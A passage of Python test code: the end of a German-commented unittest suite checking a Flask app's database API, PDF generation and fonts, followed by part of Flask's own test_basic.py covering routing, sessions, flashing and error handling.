response = self.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string":"sechs", # Pflichtfeld
"date":"2020-08-19",
"integer": 6,
"data": {"A":1},
"float": 1/3,
"decimal" : 1.2345, # soll nur 1.23 ergeben
"numeric" : 5.6789,
"isodate" :"2020-08-19",
"isodatetime" :"2020-08-19 14:37"
},
"type":"dbtests"
}
}), follow_redirects=True)
#print( response.json["data"] )
#self.assertEqual( response.status_code, 201, "Api Status nicht 201 (Created)")
#self.assertEqual( response.json["data"]["attributes"]["date"], '2020-08-19', "Datensatz datum ist nicht 2020-08-19")
#self.assertEqual( response.json["data"]["attributes"]["data"], {"A":1}, 'Datensatz data ist nicht {"A":1}')
#self.assertEqual( response.json["data"]["attributes"]["float"], 0.3333333333333333, 'Datensatz float ist nicht 0.3333333333333333')
response = self.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string":"sechs", # Pflichtfeld
"date":"2020-08-19",
"integer": 6,
"data": {"A":1},
"float": 1/3,
"decimal" : 12345.3456, # soll nur 12345.35 ergeben
"numeric" : 5.6789,
"isodate" :"2020-08-19",
"isodatetime" :"2020-08-19 14:37"
},
"type":"dbtests"
}
}), follow_redirects=True)
#print( response.json["data"] )
pass
def check_pdf_data( self, data, contents=-1, pages=-1, intern_check:bool=False ):
''' Prüft pdf data mit vorher gespeicherten data
Erzeugt im unittest dir resources ein dir 'check', um dort die Vergleichsdaten zu speichern
Gibt es dieses schon werden die dort vorhandenen Dateien als check verwendet
Parameters
----------
data : dict
- body: dict
- overlays: dict
- pages: int
- pdf_filename: string
- pdf_filepath: string
- png_filename: string
- png_filepath: string
contents : int
Anzahl der Seiten im Content
pages : int
Anzahl der Seiten im PDF
intern_check:
Wenn True wird in tests und nicht im normalem pdf Ablegeort geprüft. Default is False
Returns
-------
None.
'''
#print( data["content"] )
self.assertIn("pdf_filename", data,
"PDF data fehlerhaft filename fehlt"
)
self.assertIn("png_filepath", data,
"PNG data fehlerhaft filepath fehlt"
)
check = {}
if intern_check == True:
check_dir = osp.join( ABSPATH, "resources", "check" )
else:
check_dir = osp.join( os.path.dirname( data["pdf_filepath"] ), "check" )
# create the folders if not already exists
if not os.path.exists( check_dir ):
try:
os.makedirs( check_dir )
except IOError as e:
print("Unable to create dir.", e)
# Dateiname für den Inhalt festlegen
json_check_name = osp.join( check_dir, data["pdf_filename"] ) + ".json"
png_check_name = osp.join( check_dir, data["png_filename"] )
png_new_name = data["png_filepath"]
# akltuellen content speichern
with open( data["pdf_filepath"] + ".json" , "w" ) as json_file:
json.dump( data["content"] , json_file, indent=2 )
# beim erstenmal pdfData content in unittest anlegen
if not os.path.exists( json_check_name ):
with open(json_check_name, "w" ) as json_file:
# print("save", json_check_name)
json.dump( data["content"] , json_file, indent=2 )
if intern_check == True:
pdf_check_name = osp.join( check_dir, data["pdf_filename"] )
# beim erstenmal pdf nach check kopieren
if not os.path.exists( pdf_check_name ):
# adding exception handling
try:
copyfile( data["pdf_filepath"], pdf_check_name)
except IOError as e:
print("Unable to copy file.", e)
# beim erstenmal png nach check kopieren
if not os.path.exists( png_check_name ):
# adding exception handling
try:
copyfile(png_new_name, png_check_name)
except IOError as e:
print("Unable to copy file.", e)
page_names = data["content"].keys()
#print(page_names)
# ggf Anzahl der Bereiche prüfen
if contents > -1:
self.assertEqual(
len( page_names ),
contents,
"Anzahl der content Bereiche in '{}' stimmt nicht.".format( data["pdf_filepath"] )
)
# ggf Anzahl der Seiten prüfen
if pages > -1:
self.assertEqual(
data["pages"],
pages,
"Anzahl der Seiten in '{}' stimmt nicht.".format( data["pdf_filepath"] )
)
# erzeugte png vergleichen und diff speichern
png_check = img_io.imread( png_check_name )
png_new = img_io.imread( png_new_name )
self.assertEqual(
png_check.shape,
png_new.shape,
"Die Bildgrößen in '{}' stimmen nicht.".format( data["pdf_filepath"] )
)
# Bild verleich erstellen und speichern
compare = compare_images(png_check, png_new, method='diff')
img_io.imsave( png_new_name + ".diff.png", compare )
# passende check daten (json_check_name) laden
with open( json_check_name ) as json_file:
check = json.load( json_file )
# einige content Inhalte prüfen
from bs4 import BeautifulSoup
for page_name, content in data["content"].items():
bs_data = BeautifulSoup( content, 'html.parser')
bs_check = BeautifulSoup( check[ page_name ], 'html.parser')
# zuerst die texte
data_text = bs_data.find_all('div', {"class": "text"} )
check_text = bs_check.find_all('div', {"class": "text"} )
self.assertEqual(
data_text,
check_text,
"PDF content .text in '{}' ist fehlerhaft".format( data["pdf_filepath"] )
)
# gesamt check der Bilder
def check_mse(imageA, imageB):
# the 'Mean Squared Error' between the two images is the
# sum of the squared difference between the two images;
# NOTE: the two images must have the same dimension
err = np.sum((imageA.astype("float") - imageB.astype("float")) ** 2)
err /= float(imageA.shape[0] * imageA.shape[1])
# return the MSE, the lower the error, the more "similar"
# the two images are
return err
# MeanCheck durchführen
try:
mse = check_mse( png_check, png_new )
except:
mse = -1
#print( "Der PNG Vergleichsbild MSE von '{}' ist '{}'.".format( data["png_filepath"] + ".diff.png", mse ) )
#mse=0.0
self.assertEqual( 0.0, mse,
"Der PNG Vergleichsbild MSE stimmt nicht. Diff image '{}' prüfen. Test erneut durchführen.".format( data["png_filepath"] + ".diff.png" )
)
def test_isp_mpdf_fonts( self ):
"""Testet Fonts für die PDF Erstellung mit fc-list
Benötigte Fonts:
* DejaVuSerif
* Material Design Icons
Returns
-------
None.
"""
import subprocess
cmd = '/usr/bin/fc-list --format="%{family[0]}\n" | sort | uniq'
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE ).communicate()[0]
self.assertIn(
b"Material Design Icons",
output,
"Der Font 'Material Design Icons' fehlt im System"
)
self.assertIn(
b"DejaVu Serif",
output,
"Der Font 'DejaVuSerif' fehlt im System"
)
def test_isp_mpdf_base( self ):
''' Ein PDF Dokument erstellen
'''
response = self.app.get( "api/dummy/pdf" )
self.assertEqual(response.status_code, 400, "Status nicht 400")
self.assertEqual(
response.data,
b"Keine PDF Datei (nofile.pdf) gefunden",
"Testet Fehler bei Rückgabe eine fehlenden PDF Datei "
)
# zuerst nur ein leeres PDF mit overlay
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-1"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual( response.json["data"]["body"], "", "PDF body ist nicht leer" )
self.check_pdf_data( response.json["data"], contents=0, pages=1, intern_check=True )
# text und markdown mit Header (h2)
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-2"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
# kommt es hier zu einem Fehler stimmt die css Einbindung von weasyprint nicht
self.check_pdf_data( response.json["data"], contents=1, pages=1, intern_check=True )
# wie test 2 aber markdown zuerst
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-2a"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
#print( response.json["data"] )
self.check_pdf_data( response.json["data"], contents=1, pages=1, intern_check=True )
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-3"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.check_pdf_data( response.json["data"], contents=2, pages=4, intern_check=True )
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-4"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
# kommt es hier zu einem Fehler stimmt die font Einbindung von weasyprint nicht
self.check_pdf_data( response.json["data"], contents=2, pages=3, intern_check=True )
#print( response.json )
# .. todo:: rückgabe als pdf
def check_weasyprint( self ):
''' Ein PDF Dokument mit weasyprint erstellen
'''
# pdf weasyprint test
from weasyprint import HTML, CSS
from weasyprint.fonts import FontConfiguration
font_config = FontConfiguration()
from weasyprint import default_url_fetcher
files_loaded = []
def log_url_fetcher(url):
files_loaded.append( url )
return default_url_fetcher(url)
# HTML('<h1>foo') would be filename
base_dir = os.path.join( ABSPATH, "..", "resources" )
html = HTML(string='''
<h1>The title</h1>
<div class="blue-text">blauer Text</div>
<span>mdi-check-outline: </span><span><i class="mdi mdi-check-outline"></></span><span> Oder?</span>
''')
css = CSS(string='''
@import url(mpdf_styles.css);
h1 { font-family: Arial,"Helvetica Neue",Helvetica,sans-serif }
''', font_config=font_config, url_fetcher=log_url_fetcher, base_url=base_dir )
pdf_file_name = os.path.join( ABSPATH, 'files', 'weasyprint.pdf')
html.write_pdf( pdf_file_name, stylesheets=[css], font_config=font_config)
# es sollten min. 5 Dateien eingelesen werden
self.assertGreaterEqual(len(files_loaded), 5, "Anzahl nicht >= 5")
# only test 4
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-4"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
# kommt es hier zu einem Fehler stimmt die font Einbindung von weasyprint nicht
self.check_pdf_data( response.json["data"], contents=2, pages=3, intern_check=True )
# print( files_loaded, len(files_loaded) )
def suite( testClass:None ):
'''Fügt alle Funktionen, die mit test_ beginnen aus der angegeben Klasse der suite hinzu
Parameters
----------
testClass : unittest.TestCase
Zu testende Klasse
Returns
-------
suite : unittest.TestSuite
'''
if not testClass:
testClass = ispTest
suite = unittest.TestSuite( )
logger.setLevel( logging.ERROR ) # ERROR DEBUG WARNING
if testClass:
#suite.addTest( testClass('test_config_jinja') )
#suite.addTest( testClass('check_weasyprint') )
#suite.addTest( testClass('test_webapp_db_tests_C') )
#suite.addTest( testClass('test_webapp_db_tests_B') )
#return suite
for m in dir( testClass ):
if m.startswith('test_config_'):
suite.addTest( testClass(m), )
pass
elif m.startswith('test_webapp_base_'):
suite.addTest( testClass(m), )
pass
elif m.startswith('test_webapp_dummy_'):
suite.addTest( testClass(m), )
pass
elif m.startswith('test_webapp_db_'):
suite.addTest( testClass(m), )
pass
elif m.startswith('test_isp_mpdf_'):
suite.addTest( testClass(m), )
pass
return suite
# -----------------------------------------------------------------------------
if __name__ == '__main__':
'''
0 (quiet): you just get the total numbers of tests executed and the global result
1 (default): you get the same plus a dot for every successful test or a F for every failure
2 (verbose): you get the help string of every test and the result
'''
runner = unittest.TextTestRunner()
runner.run( suite( ispTest ) )
|
test_basic.py
|
# -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: 2010 Pallets
:license: BSD-3-Clause
"""
import re
import sys
import time
import uuid
from datetime import datetime
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import Forbidden
from werkzeug.exceptions import NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
from flask._compat import text_type
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
# Older versions of Werkzeug.test.Client don't have an options method
if hasattr(client, "options"):
rv = client.options("/")
else:
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
if hasattr(client, "options"):
rv = client.options("/more")
else:
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added
# when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert '"localhost" is not a valid cookie domain' in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return text_type(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.headers["Vary"] = "Accept-Encoding, Accept-Language"
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash(u"Hello World")
flask.flash(u"Hello World", "error")
flask.flash(flask.Markup(u"<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u"Hello World",
u"Hello World",
flask.Markup(u"<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", u"Hello World"),
("error", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", u"Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == u"Hello World"
assert messages[1] == flask.Markup(u"<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_403(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
